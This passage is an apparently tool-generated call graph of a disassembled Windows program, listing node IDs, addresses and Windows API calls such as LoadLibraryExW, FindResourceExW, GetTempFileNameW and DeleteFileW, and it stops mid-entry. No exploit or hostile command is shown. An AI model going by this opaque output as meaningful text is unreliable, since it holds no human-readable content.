100847->100848 100849 437d3a 100847->100849 100848->100784 100849->100848 100851 437e4f 100849->100851 100852 437e62 100851->100852 100854 437e5f _memmove 100851->100854 100853 450db6 Mailbox 59 API calls 100852->100853 100853->100854 100854->100848 100856 437a5f 100855->100856 100857 437a85 _memmove 100855->100857 100856->100857 100858 450db6 Mailbox 59 API calls 100856->100858 100857->100790 100859 437ad4 100858->100859 100860 450db6 Mailbox 59 API calls 100859->100860 100860->100857 100861->100791 100862->100796 100864 437c5f __wsetenvp 100863->100864 100865 437c70 _memmove 100864->100865 100866 438029 59 API calls 100864->100866 100865->100803 100867 46ed07 _memmove 100866->100867 100868 46fe27 100881 44f944 100868->100881 100870 46fe3d 100871 46fe53 100870->100871 100872 46febe 100870->100872 100970 439e5d 60 API calls 100871->100970 100890 43fce0 100872->100890 100874 46fe92 100876 47089c 100874->100876 100877 46fe9a 100874->100877 100972 499e4a 89 API calls 4 library calls 100876->100972 100971 49834f 59 API calls Mailbox 100877->100971 100880 46feb2 Mailbox 100882 44f950 100881->100882 100883 44f962 100881->100883 100973 439d3c 60 API calls Mailbox 100882->100973 100885 44f991 100883->100885 100886 44f968 100883->100886 100974 439d3c 60 API calls Mailbox 100885->100974 100888 450db6 Mailbox 59 API calls 100886->100888 100889 44f95a 100888->100889 100889->100870 100975 438180 100890->100975 100892 43fd3d 100894 47472d 100892->100894 100953 4406f6 100892->100953 100980 43f234 100892->100980 101098 499e4a 89 API calls 4 library calls 100894->101098 100897 47488d 100903 43fe4c 100897->100903 100932 474742 100897->100932 101104 4aa2d9 85 API calls Mailbox 100897->101104 100898 43fe3e 100898->100897 100898->100903 101102 4866ec 59 API calls 2 library calls 100898->101102 100899 440517 100910 450db6 Mailbox 59 API calls 100899->100910 100900 474b53 100900->100932 101119 499e4a 89 API calls 4 library calls 100900->101119 100902 450db6 59 API calls Mailbox 100917 43fdd3 100902->100917 100903->100900 100912 4748f9 100903->100912 100984 43837c 100903->100984 100904 4747d7 100904->100932 101100 499e4a 89 API calls 4 library calls 100904->101100 100906 474755 100906->100904 101099 43f6a3 331 API calls 100906->101099 100907 474848 101103 4860ef 59 API calls 2 library calls 100907->101103 100916 440545 _memmove 100910->100916 100911 4748b2 Mailbox 100911->100903 101105 4866ec 59 API calls 2 library calls 100911->101105 100921 474917 100912->100921 101106 4385c0 59 API calls Mailbox 100912->101106 100927 450db6 Mailbox 59 API calls 100916->100927 100917->100898 100917->100899 100917->100902 100917->100906 100917->100916 100917->100932 100942 47480c 100917->100942 101072 439ea0 100917->101072 100918 43fea4 100925 474ad6 100918->100925 100926 43ff32 100918->100926 100964 440179 Mailbox _memmove 100918->100964 100919 47486b 100922 439ea0 331 API calls 100919->100922 100924 474928 100921->100924 101107 4385c0 59 API calls Mailbox 100921->101107 100922->100897 100924->100964 101108 4860ab 59 API calls Mailbox 100924->101108 101117 499ae7 60 API calls 100925->101117 100930 450db6 Mailbox 59 API calls 100926->100930 100968 440106 _memmove 100927->100968 100934 43ff39 100930->100934 100934->100953 100991 4409d0 100934->100991 100936 474a4d 100937 439ea0 331 API calls 100936->100937 100939 474a87 100937->100939 100939->100932 101112 4384c0 100939->101112 100941 43ffb2 100941->100916 100948 43ffe6 100941->100948 100941->100953 101101 499e4a 89 API calls 4 library calls 100942->101101 100946 474ab2 101116 499e4a 89 API calls 4 library calls 100946->101116 100950 438047 59 API calls 100948->100950 100955 440007 100948->100955 100950->100955 101097 499e4a 89 API calls 4 library calls 100953->101097 100954 440398 100954->100880 100955->100953 100957 474b24 100955->100957 100959 44004c 100955->100959 100956 450db6 59 API calls Mailbox 100956->100964 101118 439d3c 60 API calls Mailbox 100957->101118 100959->100900 100959->100953 100960 4400d8 100959->100960 101068 439d3c 60 API calls Mailbox 100960->101068 100962 474a1c 100965 450db6 Mailbox 59 API calls 100962->100965 100963 4400eb 100963->100953 101069 4382df 59 API calls Mailbox 100963->101069 100964->100936 100964->100946 100964->100953 100964->100954 100964->100956 100964->100962 101070 438740 68 API calls __cinit 100964->101070 101071 438660 68 API calls 100964->101071 101109 495937 68 API calls 100964->101109 101110 4389b3 69 API calls Mailbox 100964->101110 101111 439d3c 60 API calls Mailbox 100964->101111 100965->100936 100968->100964 100969 440162 100968->100969 101096 439c90 59 API calls Mailbox 100968->101096 100969->100880 100970->100874 100971->100880 100972->100880 100973->100889 100974->100889 100976 43818f 100975->100976 100979 4381aa 100975->100979 100977 437e4f 59 API calls 100976->100977 100978 438197 CharUpperBuffW 100977->100978 100978->100979 100979->100892 100981 43f251 100980->100981 100982 43f272 100981->100982 101120 499e4a 89 API calls 4 library calls 100981->101120 100982->100917 100985 46edbd 100984->100985 100986 43838d 100984->100986 100987 450db6 Mailbox 59 API calls 100986->100987 100988 438394 100987->100988 100989 4383b5 100988->100989 101121 438634 59 API calls Mailbox 100988->101121 100989->100912 100989->100918 100992 474cc3 100991->100992 101003 4409f5 100991->101003 101176 499e4a 89 API calls 4 library calls 100992->101176 100994 440cfa 100994->100941 100996 440ee4 100996->100994 100998 440ef1 100996->100998 101174 441093 331 API calls Mailbox 100998->101174 100999 440a4b PeekMessageW 101066 440a05 Mailbox 100999->101066 101002 440ef8 LockWindowUpdate DestroyWindow GetMessageW 101002->100994 101005 440f2a 101002->101005 101003->101066 101177 439e5d 60 API calls 101003->101177 101178 486349 331 API calls 101003->101178 101004 474e81 Sleep 101004->101066 101008 475c58 TranslateMessage DispatchMessageW GetMessageW 101005->101008 101006 440ce4 101006->100994 101173 441070 10 API calls Mailbox 101006->101173 101008->101008 101009 475c88 101008->101009 101009->100994 101010 440ea5 TranslateMessage DispatchMessageW 101011 440e43 PeekMessageW 101010->101011 101011->101066 101012 474d50 TranslateAcceleratorW 101012->101011 101012->101066 101013 439e5d 60 API calls 101013->101066 101014 440d13 timeGetTime 101014->101066 101015 47581f WaitForSingleObject 101021 47583c GetExitCodeProcess CloseHandle 101015->101021 101015->101066 101017 450db6 59 API calls Mailbox 101017->101066 101018 440e5f Sleep 101052 440e70 Mailbox 101018->101052 101019 438047 59 API calls 101019->101066 101050 440f95 101021->101050 101022 475af8 Sleep 101022->101052 101025 45049f timeGetTime 101025->101052 101026 440f4e timeGetTime 101175 439e5d 60 API calls 101026->101175 101029 475b8f GetExitCodeProcess 101034 475ba5 WaitForSingleObject 101029->101034 101035 475bbb CloseHandle 101029->101035 101032 4b5f25 110 API calls 101032->101052 101033 43b7dd 109 API calls 101033->101052 101034->101035 101034->101066 101035->101052 101037 475874 101037->101050 101038 475078 Sleep 101038->101066 101039 475c17 Sleep 101039->101066 101045 439ea0 304 API calls 101045->101066 101048 43fce0 304 API calls 101048->101066 101050->100941 101052->101025 101052->101029 101052->101032 101052->101033 101052->101037 101052->101038 101052->101039 101052->101050 101052->101066 101203 437667 101052->101203 101208 492408 60 API calls 101052->101208 101209 439e5d 60 API calls 101052->101209 101210 437de1 101052->101210 101214 4389b3 69 API calls Mailbox 101052->101214 101215 43b73c 331 API calls 101052->101215 101216 4864da 60 API calls 101052->101216 101217 495244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101052->101217 101218 493c55 66 API calls Mailbox 101052->101218 101054 4384c0 69 API calls 101054->101066 101055 499e4a 89 API calls 101055->101066 101056 439c90 59 API calls Mailbox 101056->101066 101058 48617e 59 API calls Mailbox 101058->101066 101059 437de1 59 API calls 101059->101066 101060 4389b3 69 API calls 101060->101066 101061 4755d5 VariantClear 101061->101066 101062 438cd4 59 API calls Mailbox 101062->101066 101063 486e8f 59 API calls 101063->101066 101064 47566b VariantClear 101064->101066 101065 475419 VariantClear 101065->101066 101066->100999 101066->101004 101066->101006 101066->101010 101066->101011 101066->101012 101066->101013 101066->101014 101066->101015 101066->101017 101066->101018 101066->101019 101066->101022 101066->101026 101066->101045 101066->101048 101066->101050 101066->101052 101066->101054 101066->101055 101066->101056 101066->101058 101066->101059 101066->101060 101066->101061 101066->101062 101066->101063 101066->101064 101066->101065 101067 43b73c 304 API calls 101066->101067 101122 43e6a0 101066->101122 101153 43f460 101066->101153 101171 43e420 331 API calls 101066->101171 101172 4331ce IsDialogMessageW GetClassLongW 101066->101172 101179 4b6018 59 API calls 101066->101179 101180 499a15 59 API calls Mailbox 101066->101180 101181 48d4f2 59 API calls 101066->101181 101182 439837 101066->101182 101200 4860ef 59 API calls 2 library calls 101066->101200 101201 438401 59 API calls 101066->101201 101202 4382df 59 API calls Mailbox 101066->101202 101067->101066 101068->100963 101069->100968 101070->100964 101071->100964 101073 439ebf 101072->101073 101091 439eed Mailbox 101072->101091 101074 450db6 Mailbox 59 API calls 101073->101074 101074->101091 101075 452d40 67 API calls __cinit 101075->101091 101076 43b475 101077 438047 59 API calls 101076->101077 101092 43a057 101077->101092 101078 43b47a 101080 4709e5 101078->101080 101081 470055 101078->101081 101079 450db6 59 API calls Mailbox 101079->101091 102257 499e4a 89 API calls 4 library calls 101080->102257 102254 499e4a 89 API calls 4 library calls 101081->102254 101085 438047 59 API calls 101085->101091 101086 470064 101086->100917 101087 43a55a 102255 499e4a 89 API calls 4 library calls 101087->102255 101090 437667 59 API calls 101090->101091 101091->101075 101091->101076 101091->101078 101091->101079 101091->101081 101091->101085 101091->101087 101091->101090 101091->101092 101093 486e8f 59 API calls 101091->101093 101094 4709d6 101091->101094 102237 43b900 101091->102237 102253 43c8c0 331 API calls 2 library calls 101091->102253 101092->100917 101093->101091 102256 499e4a 89 API calls 4 library calls 101094->102256 101096->100968 101097->100894 101098->100932 101099->100904 101100->100932 101101->100932 101102->100907 101103->100919 101104->100911 101105->100911 101106->100921 101107->100924 101108->100964 101109->100964 101110->100964 101111->100964 101113 4384cb 101112->101113 101115 4384f2 101113->101115 102263 4389b3 69 API calls Mailbox 101113->102263 101115->100946 101116->100932 101117->100948 101118->100900 101119->100932 101120->100982 101121->100989 101123 43e6d5 101122->101123 101124 473aa9 101123->101124 101127 43e73f 101123->101127 101137 43e799 101123->101137 101125 439ea0 331 API calls 101124->101125 101126 473abe 101125->101126 101141 43e970 Mailbox 101126->101141 101220 499e4a 89 API calls 4 library calls 101126->101220 101130 437667 59 API calls 101127->101130 101127->101137 101128 437667 59 API calls 101128->101137 101131 473b04 101130->101131 101221 452d40 101131->101221 101132 452d40 __cinit 67 API calls 101132->101137 101133 43ea78 101133->101066 101135 473b26 101135->101066 101136 4384c0 69 API calls 101136->101141 101137->101128 101137->101132 101137->101135 101138 43e95a 101137->101138 101137->101141 101138->101141 101224 499e4a 89 API calls 4 library calls 101138->101224 101140 439ea0 331 API calls 101140->101141 101141->101133 101141->101136 101141->101140 101142 43f195 101141->101142 101145 499e4a 89 API calls 101141->101145 101147 438d40 59 API calls 101141->101147 101219 437f77 59 API calls 2 library calls 101141->101219 101225 486e8f 59 API calls 101141->101225 101226 4ac5c3 331 API calls 101141->101226 101227 4ab53c 331 API calls Mailbox 101141->101227 101229 439c90 59 API calls Mailbox 101141->101229 101230 4a93c6 331 API calls Mailbox 101141->101230 101228 499e4a 89 API calls 4 library calls 101142->101228 101145->101141 101147->101141 101152 473e25 101152->101066 101154 43f650 101153->101154 101155 43f4ba 101153->101155 101158 437de1 59 API calls 101154->101158 101156 43f4c6 101155->101156 101157 47441e 101155->101157 101401 43f290 331 API calls 2 library calls 101156->101401 101403 4abc6b 101157->101403 101164 43f58c Mailbox 101158->101164 101161 47442c 101165 43f630 101161->101165 101443 499e4a 89 API calls 4 library calls 101161->101443 101163 43f4fd 101163->101161 101163->101164 101163->101165 101309 49cb7a 101164->101309 101389 4a445a 101164->101389 101398 493c37 101164->101398 101165->101066 101167 43f5e3 101167->101165 101402 439c90 59 API calls Mailbox 101167->101402 101171->101066 101172->101066 101173->100996 101174->101002 101175->101066 101176->101003 101177->101003 101178->101003 101179->101066 101180->101066 101181->101066 101183 439851 101182->101183 101192 43984b 101182->101192 101184 439857 __itow 101183->101184 101185 439899 101183->101185 101186 46f5d3 __i64tow 101183->101186 101188 46f4da 101183->101188 101189 450db6 Mailbox 59 API calls 101184->101189 102235 453698 83 API calls 3 library calls 101185->102235 101186->101186 101193 450db6 Mailbox 59 API calls 101188->101193 101199 46f552 Mailbox _wcscpy 101188->101199 101191 439871 101189->101191 101191->101192 101194 437de1 59 API calls 101191->101194 101192->101066 101195 46f51f 101193->101195 101194->101192 101196 450db6 Mailbox 59 API calls 101195->101196 101197 46f545 101196->101197 101198 437de1 59 API calls 101197->101198 101197->101199 101198->101199 102236 453698 83 API calls 3 library calls 101199->102236 101200->101066 101201->101066 101202->101066 101204 450db6 Mailbox 59 API calls 101203->101204 101205 437688 101204->101205 101206 450db6 Mailbox 59 API calls 101205->101206 101207 437696 101206->101207 101207->101052 101208->101052 101209->101052 101211 437df0 __wsetenvp _memmove 101210->101211 101212 450db6 Mailbox 59 API calls 101211->101212 101213 437e2e 101212->101213 101213->101052 101214->101052 101215->101052 101216->101052 101217->101052 101218->101052 101219->101141 101220->101141 101231 452c44 101221->101231 101223 452d4b 101223->101137 101224->101141 101225->101141 101226->101141 101227->101141 101228->101152 101229->101141 101230->101141 101232 452c50 __close 101231->101232 101239 453217 101232->101239 101238 452c77 __close 101238->101223 101256 459c0b 101239->101256 101241 452c59 101242 452c88 DecodePointer DecodePointer 101241->101242 101243 452cb5 101242->101243 101244 452c65 101242->101244 101243->101244 101302 4587a4 59 API calls __wopenfile 101243->101302 101253 452c82 101244->101253 101246 452d18 EncodePointer EncodePointer 101246->101244 101247 452cc7 101247->101246 101248 452cec 101247->101248 101303 458864 61 API calls __realloc_crt 101247->101303 101248->101244 101251 452d06 EncodePointer 101248->101251 101304 458864 61 API calls __realloc_crt 101248->101304 101251->101246 101252 452d00 101252->101244 101252->101251 101305 453220 101253->101305 101257 459c1c 101256->101257 101258 459c2f EnterCriticalSection 101256->101258 101263 459c93 101257->101263 101258->101241 101260 459c22 101260->101258 101287 4530b5 58 API calls 3 library calls 101260->101287 101264 459c9f __close 101263->101264 101265 459cc0 101264->101265 101266 459ca8 101264->101266 101268 459ce1 __close 101265->101268 101291 45881d 58 API calls 2 library calls 101265->101291 101288 45a16b 58 API calls __NMSG_WRITE 101266->101288 101268->101260 101269 459cad 101289 45a1c8 58 API calls 7 library calls 101269->101289 101271 459cd5 101273 459cdc 101271->101273 101274 459ceb 101271->101274 101292 458b28 58 API calls __getptd_noexit 101273->101292 101277 459c0b __lock 58 API calls 101274->101277 101275 459cb4 101290 45309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101275->101290 101279 459cf2 101277->101279 101281 459d17 101279->101281 101282 459cff 101279->101282 101294 452d55 101281->101294 101293 459e2b InitializeCriticalSectionAndSpinCount 101282->101293 101285 459d0b 101300 459d33 LeaveCriticalSection _doexit 101285->101300 101288->101269 101289->101275 101291->101271 101292->101268 101293->101285 101295 452d5e RtlFreeHeap 101294->101295 101299 452d87 __dosmaperr 101294->101299 101296 452d73 101295->101296 101295->101299 101301 458b28 58 API calls __getptd_noexit 101296->101301 101298 452d79 GetLastError 101298->101299 101299->101285 101300->101268 101301->101298 101302->101247 101303->101248 101304->101252 101308 459d75 LeaveCriticalSection 101305->101308 101307 452c87 101307->101238 101308->101307 101310 437667 59 API calls 101309->101310 101311 49cbaf 101310->101311 101312 437667 59 API calls 101311->101312 101313 49cbb8 101312->101313 101314 49cbcc 101313->101314 101631 439b3c 59 API calls 101313->101631 101316 439837 84 API calls 101314->101316 101317 49cbe9 101316->101317 101318 49cc0b 101317->101318 101319 49ccea 101317->101319 101324 49cd1a Mailbox 101317->101324 101320 439837 84 API calls 101318->101320 101444 434ddd 101319->101444 101322 49cc17 101320->101322 101325 438047 59 API calls 101322->101325 101324->101167 101328 49cc23 101325->101328 101326 49cd16 101326->101324 101327 437667 59 API calls 101326->101327 101330 49cd4b 101327->101330 101333 49cc69 101328->101333 101334 49cc37 101328->101334 101329 434ddd 136 API calls 101329->101326 101331 437667 59 API calls 101330->101331 101332 49cd54 101331->101332 101337 437667 59 API calls 101332->101337 101336 439837 84 API calls 101333->101336 101335 438047 59 API calls 101334->101335 101338 49cc47 101335->101338 101339 49cc76 101336->101339 101340 49cd5d 101337->101340 101341 437cab 59 API calls 101338->101341 101342 438047 59 API calls 101339->101342 101343 437667 59 API calls 101340->101343 101344 49cc51 101341->101344 101345 49cc82 101342->101345 101346 49cd66 101343->101346 101347 439837 84 API calls 101344->101347 101632 494a31 GetFileAttributesW 101345->101632 101349 439837 84 API calls 101346->101349 101350 49cc5d 101347->101350 101352 49cd73 101349->101352 101354 437b2e 59 API calls 101350->101354 101351 49cc8b 101357 4379f2 59 API calls 101351->101357 101358 49cc9e 101351->101358 101468 43459b 101352->101468 101354->101333 101355 49cd8e 101519 4379f2 101355->101519 101356 439837 84 API calls 101360 49cccb 101356->101360 101357->101358 101358->101356 101364 49cca4 101358->101364 101633 4937ef 75 API calls Mailbox 101360->101633 101363 49cdd1 101366 438047 59 API calls 101363->101366 101364->101324 101365 4379f2 59 API calls 101367 49cdae 101365->101367 101368 49cddf 101366->101368 101367->101363 101370 437bcc 59 API calls 101367->101370 101369 437b2e 59 API calls 101368->101369 101371 49cded 101369->101371 101373 49cdc3 101370->101373 101372 437b2e 59 API calls 101371->101372 101374 49cdfb 101372->101374 101375 437bcc 59 API calls 101373->101375 101376 437b2e 59 API calls 101374->101376 101375->101363 101377 49ce09 101376->101377 101378 439837 84 API calls 101377->101378 101379 49ce15 101378->101379 101522 494071 101379->101522 101381 49ce26 101382 493c37 3 API calls 101381->101382 101383 49ce30 101382->101383 101384 439837 84 API calls 101383->101384 101387 49ce61 101383->101387 101385 49ce4e 101384->101385 101576 499155 101385->101576 101634 434e4a 101387->101634 101390 439837 84 API calls 101389->101390 101391 4a4494 101390->101391 102183 436240 101391->102183 101393 4a44a4 101394 4a44c9 101393->101394 101395 439ea0 331 API calls 101393->101395 101397 4a44cd 101394->101397 102208 439a98 59 API calls Mailbox 101394->102208 101395->101394 101397->101167 102223 49445a GetFileAttributesW 101398->102223 101401->101163 101402->101167 101404 4abcb0 101403->101404 101405 4abc96 101403->101405 102228 4aa213 59 API calls Mailbox 101404->102228 102227 499e4a 89 API calls 4 library calls 101405->102227 101408 4abcbb 101409 439ea0 330 API calls 101408->101409 101411 4abd1c 101409->101411 101410 4abca8 Mailbox 101410->101161 101411->101410 101412 4abdae 101411->101412 101416 4abd5d 101411->101416 101413 4abe04 101412->101413 101414 4abdb4 101412->101414 101413->101410 101415 439837 84 API calls 101413->101415 102230 49791a 59 API calls 101414->102230 101417 4abe16 101415->101417 102229 4972df 59 API calls Mailbox 101416->102229 101419 437e4f 59 API calls 101417->101419 101422 4abe3a CharUpperBuffW 101419->101422 101420 4abdd7 102231 435d41 59 API calls Mailbox 101420->102231 101426 4abe54 101422->101426 101424 4abd8d 101425 43f460 330 API calls 101424->101425 101425->101410 101427 4abe5b 101426->101427 101428 4abea7 101426->101428 102232 4972df 59 API calls Mailbox 101427->102232 101430 439837 84 API calls 101428->101430 101429 4abddf Mailbox 101431 43fce0 330 API calls 101429->101431 101432 4abeaf 101430->101432 101431->101410 102233 439e5d 60 API calls 101432->102233 101435 4abe89 101436 43f460 330 API calls 101435->101436 101436->101410 101437 4abeb9 101437->101410 101438 439837 84 API calls 101437->101438 101439 4abed4 101438->101439 102234 435d41 59 API calls Mailbox 101439->102234 101441 4abee4 101442 43fce0 330 API calls 101441->101442 101442->101410 101443->101165 101640 434bb5 101444->101640 101449 46d8e6 101452 434e4a 84 API calls 101449->101452 101450 434e08 LoadLibraryExW 101650 434b6a 101450->101650 101454 46d8ed 101452->101454 101456 434b6a 3 API calls 101454->101456 101458 46d8f5 101456->101458 101457 434e2f 101457->101458 101459 434e3b 101457->101459 101676 434f0b 101458->101676 101460 434e4a 84 API calls 101459->101460 101463 434e40 101460->101463 101463->101326 101463->101329 101465 46d91c 101684 434ec7 101465->101684 101469 437667 59 API calls 101468->101469 101470 4345b1 101469->101470 101471 437667 59 API calls 101470->101471 101472 4345b9 101471->101472 101473 437667 59 API calls 101472->101473 101474 4345c1 101473->101474 101475 437667 59 API calls 101474->101475 101476 4345c9 101475->101476 101477 46d4d2 101476->101477 101478 4345fd 101476->101478 101479 438047 59 API calls 101477->101479 101480 43784b 59 API calls 101478->101480 101481 46d4db 101479->101481 101482 43460b 101480->101482 101872 437d8c 101481->101872 101484 437d2c 59 API calls 101482->101484 101485 434615 101484->101485 101486 434640 101485->101486 101487 43784b 59 API calls 101485->101487 101489 43465f 101486->101489 101490 46d4fb 101486->101490 101503 434680 101486->101503 101491 434636 101487->101491 101492 4379f2 59 API calls 101489->101492 101494 46d5cb 101490->101494 101505 46d5b4 101490->101505 101512 46d532 101490->101512 101495 437d2c 59 API calls 101491->101495 101496 434669 101492->101496 101493 434691 101497 4346a3 101493->101497 101499 438047 59 API calls 101493->101499 101498 437bcc 59 API calls 101494->101498 101495->101486 101501 43784b 59 API calls 101496->101501 101496->101503 101500 4346b3 101497->101500 101502 438047 59 API calls 101497->101502 101514 46d588 101498->101514 101499->101497 101504 438047 59 API calls 101500->101504 101506 4346ba 101500->101506 101501->101503 101502->101500 101859 43784b 101503->101859 101504->101506 101505->101494 101509 46d59f 101505->101509 101507 438047 59 API calls 101506->101507 101516 4346c1 Mailbox 101506->101516 101507->101516 101508 46d590 101510 437bcc 59 API calls 101508->101510 101511 437bcc 59 API calls 101509->101511 101510->101514 101511->101514 101512->101508 101517 46d57b 101512->101517 101513 4379f2 59 API calls 101513->101514 101514->101503 101514->101513 101876 437924 59 API calls 2 library calls 101514->101876 101516->101355 101518 437bcc 59 API calls 101517->101518 101518->101514 101520 437e4f 59 API calls 101519->101520 101521 4379fd 101520->101521 101521->101363 101521->101365 101523 49408d 101522->101523 101524 4940a0 101523->101524 101525 494092 101523->101525 101526 437667 59 API calls 101524->101526 101527 438047 59 API calls 101525->101527 101528 4940a8 101526->101528 101575 49409b Mailbox 101527->101575 101529 437667 59 API calls 101528->101529 101530 4940b0 101529->101530 101531 437667 59 API calls 101530->101531 101532 4940bb 101531->101532 101533 437667 59 API calls 101532->101533 101534 4940c3 101533->101534 101535 437667 59 API calls 101534->101535 101536 4940cb 101535->101536 101537 437667 59 API calls 101536->101537 101538 4940d3 101537->101538 101539 437667 59 API calls 101538->101539 101540 4940db 101539->101540 101541 437667 59 API calls 101540->101541 101542 4940e3 101541->101542 101543 43459b 59 API calls 101542->101543 101544 4940fa 101543->101544 101545 43459b 59 API calls 101544->101545 101546 494113 101545->101546 101547 4379f2 59 API calls 101546->101547 101548 49411f 101547->101548 101549 494132 101548->101549 101550 437d2c 59 API calls 101548->101550 101551 4379f2 59 API calls 101549->101551 101550->101549 101552 49413b 101551->101552 101553 49414b 101552->101553 101554 437d2c 59 API calls 101552->101554 101555 438047 59 API calls 101553->101555 101554->101553 101556 494157 101555->101556 101557 437b2e 59 API calls 101556->101557 101558 494163 101557->101558 101878 494223 59 API calls 101558->101878 101560 494172 101879 494223 59 API calls 101560->101879 101562 494185 101563 4379f2 59 API calls 101562->101563 101564 49418f 101563->101564 101565 494194 101564->101565 101566 4941a6 101564->101566 101567 437cab 59 API calls 101565->101567 101568 4379f2 59 API calls 101566->101568 101569 4941a1 101567->101569 101570 4941af 101568->101570 101573 437b2e 59 API calls 101569->101573 101571 4941cd 101570->101571 101572 437cab 59 API calls 101570->101572 101574 437b2e 59 API calls 101571->101574 101572->101569 101573->101571 101574->101575 101575->101381 101577 499162 __write_nolock 101576->101577 101578 450db6 Mailbox 59 API calls 101577->101578 101579 4991bf 101578->101579 101580 43522e 59 API calls 101579->101580 101581 4991c9 101580->101581 101582 498f5f GetSystemTimeAsFileTime 101581->101582 101583 4991d4 101582->101583 101584 434ee5 85 API calls 101583->101584 101585 4991e7 _wcscmp 101584->101585 101586 4992b8 101585->101586 101587 49920b 101585->101587 101588 499734 96 API calls 101586->101588 101910 499734 101587->101910 101601 499284 _wcscat 101588->101601 101592 434f0b 74 API calls 101594 4992dd 101592->101594 101593 4992c1 101593->101387 101595 434f0b 74 API calls 101594->101595 101597 4992ed 101595->101597 101596 499239 _wcscat _wcscpy 101917 4540fb 58 API calls __wsplitpath_helper 101596->101917 101598 434f0b 74 API calls 101597->101598 101600 499308 101598->101600 101602 434f0b 74 API calls 101600->101602 101601->101592 101601->101593 101603 499318 101602->101603 101604 434f0b 74 API calls 101603->101604 101605 499333 101604->101605 101606 434f0b 74 API calls 101605->101606 101607 499343 101606->101607 101608 434f0b 74 API calls 101607->101608 101609 499353 101608->101609 101610 434f0b 74 API calls 101609->101610 101611 499363 101610->101611 101880 4998e3 GetTempPathW GetTempFileNameW 101611->101880 101613 49936f 101614 45525b 115 API calls 101613->101614 101624 499380 101614->101624 101615 49943a 101894 4553a6 101615->101894 101617 499445 101619 49944b DeleteFileW 101617->101619 101620 49945f 101617->101620 101618 434f0b 74 API calls 101618->101624 101619->101593 101621 499505 CopyFileW 101620->101621 101626 499469 _wcsncpy 101620->101626 101622 49951b DeleteFileW 101621->101622 101623 49952d DeleteFileW 101621->101623 101622->101593 101907 4998a2 CreateFileW 101623->101907 101624->101593 101624->101615 101624->101618 101881 454863 101624->101881 101918 498b06 116 API calls __fcloseall 101626->101918 101629 4994f0 101629->101623 101630 4994f4 DeleteFileW 101629->101630 101630->101593 101631->101314 101632->101351 101633->101364 101635 434e54 101634->101635 101637 434e5b 101634->101637 101636 4553a6 __fcloseall 83 API calls 101635->101636 101636->101637 101638 434e7b FreeLibrary 101637->101638 101639 434e6a 101637->101639 101638->101639 101639->101324 101689 434c03 101640->101689 101643 434bf5 101647 45525b 101643->101647 101644 434bec FreeLibrary 101644->101643 101645 434c03 2 API calls 101646 434bdc 101645->101646 101646->101643 101646->101644 101693 455270 101647->101693 101649 434dfc 101649->101449 101649->101450 101774 434c36 101650->101774 101653 434c36 2 API calls 101656 434b8f 101653->101656 101654 434ba1 FreeLibrary 101655 434baa 101654->101655 101657 434c70 101655->101657 101656->101654 101656->101655 101658 450db6 Mailbox 59 API calls 101657->101658 101659 434c85 101658->101659 101778 43522e 101659->101778 101661 434c91 _memmove 101662 434ccc 101661->101662 101664 434dc1 101661->101664 101665 434d89 101661->101665 101663 434ec7 69 API calls 101662->101663 101672 434cd5 101663->101672 101792 49991b 95 API calls 101664->101792 101781 434e89 CreateStreamOnHGlobal 101665->101781 101668 434f0b 74 API calls 101668->101672 101670 434d69 101670->101457 101671 46d8a7 101673 434ee5 85 API calls 101671->101673 101672->101668 101672->101670 101672->101671 101787 434ee5 101672->101787 101674 46d8bb 101673->101674 101675 434f0b 74 API calls 101674->101675 101675->101670 101677 434f1d 101676->101677 101680 46d9cd 101676->101680 101816 4555e2 101677->101816 101681 499109 101836 498f5f 101681->101836 101683 49911f 101683->101465 101685 434ed6 101684->101685 101686 46d990 101684->101686 101841 455c60 101685->101841 101688 434ede 101690 434bd0 101689->101690 101691 434c0c LoadLibraryA 101689->101691 101690->101645 101690->101646 101691->101690 101692 434c1d GetProcAddress 101691->101692 101692->101690 101695 45527c __close 101693->101695 101694 45528f 101742 458b28 58 API calls __getptd_noexit 101694->101742 101695->101694 101697 4552c0 101695->101697 101712 4604e8 101697->101712 101698 455294 101743 458db6 9 API calls __wopenfile 101698->101743 101701 4552c5 101702 4552ce 101701->101702 101703 4552db 101701->101703 101744 458b28 58 API calls __getptd_noexit 101702->101744 101705 455305 101703->101705 101706 4552e5 101703->101706 101727 460607 101705->101727 101745 458b28 58 API calls __getptd_noexit 101706->101745 101707 45529f __close @_EH4_CallFilterFunc@8 101707->101649 101713 4604f4 __close 101712->101713 101714 459c0b __lock 58 API calls 101713->101714 101725 460502 101714->101725 101715 460576 101747 4605fe 101715->101747 101716 46057d 101752 45881d 58 API calls 2 library calls 101716->101752 101719 460584 101719->101715 101753 459e2b InitializeCriticalSectionAndSpinCount 101719->101753 101720 4605f3 __close 101720->101701 101722 459c93 __mtinitlocknum 58 API calls 101722->101725 101724 4605aa EnterCriticalSection 101724->101715 101725->101715 101725->101716 101725->101722 101750 456c50 59 API calls __lock 101725->101750 101751 456cba LeaveCriticalSection LeaveCriticalSection _doexit 101725->101751 101736 460627 __wopenfile 101727->101736 101728 460641 101758 458b28 58 API calls __getptd_noexit 101728->101758 101730 4607fc 101730->101728 101734 46085f 101730->101734 101731 460646 101759 458db6 9 API calls __wopenfile 101731->101759 101733 455310 101746 455332 LeaveCriticalSection LeaveCriticalSection __wfsopen 101733->101746 101755 4685a1 101734->101755 101736->101728 101736->101730 101760 4537cb 60 API calls 2 library calls 101736->101760 101738 4607f5 101738->101730 101761 4537cb 60 API calls 2 library calls 101738->101761 101740 460814 101740->101730 101762 4537cb 60 API calls 2 library calls 101740->101762 101742->101698 101743->101707 101744->101707 101745->101707 101746->101707 101754 459d75 LeaveCriticalSection 101747->101754 101749 460605 101749->101720 101750->101725 101751->101725 101752->101719 101753->101724 101754->101749 101763 467d85 101755->101763 101757 4685ba 101757->101733 101758->101731 101759->101733 101760->101738 101761->101740 101762->101730 101764 467d91 __close 101763->101764 101765 467da7 101764->101765 101768 467ddd 101764->101768 101766 458b28 __wopenfile 58 API calls 101765->101766 101767 467dac 101766->101767 101769 458db6 __wopenfile 9 API calls 101767->101769 101770 467e4e __wsopen_nolock 109 API calls 101768->101770 101773 467db6 __close 101769->101773 101771 467df9 101770->101771 101772 467e22 __wsopen_helper LeaveCriticalSection 101771->101772 101772->101773 101773->101757 101775 434b83 101774->101775 101776 434c3f LoadLibraryA 101774->101776 101775->101653 101775->101656 101776->101775 101777 434c50 GetProcAddress 101776->101777 101777->101775 101779 450db6 Mailbox 59 API calls 101778->101779 101780 435240 101779->101780 101780->101661 101782 434ea3 FindResourceExW 101781->101782 101786 434ec0 101781->101786 101783 